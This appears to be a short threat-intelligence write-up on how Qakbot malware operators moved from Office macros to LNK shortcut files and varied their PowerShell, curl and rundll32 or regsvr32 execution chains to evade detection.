The operators of the Qakbot malware have been observed transforming their delivery vectors in an attempt to evade detection. Qakbot has been a recurring threat since late 2007, evolving from its initial purpose as a banking trojan to a more sophisticated and modular information stealer capable of deploying next-stage payloads such as ransomware.
Initial tactics in early 2022 show Qakbot opting for delivering the malware via XLM 4.0 macros in malicious Microsoft Office documents. These documents would be delivered via phishing emails that commonly contained keywords used for finance and business operations to try and entice the user into opening and executing them. Over the past few months, however, Qakbot has instead opted to use shortcut LNK files as the delivery method for the malware. This decision is likely due to Microsoft’s decision to block macro execution. These latest LNK payloads have also seen shifts in the process executing the main Qakbot DLL, sometimes opting for rundll32.exe instead of regsvr32.exe. The download methodology is also different between recent variants, with powershell.exe sometimes being used to download and execute the main DLL payload as opposed to a combination of cmd.exe and curl.exe being used to download and then execute the file.
These varying methodologies are a clear sign of Qakbot evolving to not only evade security practice and defenses, but also adapt to major changes occurring in infrastructure. It is likely that Qakbot, and other malware, will continue to adapt.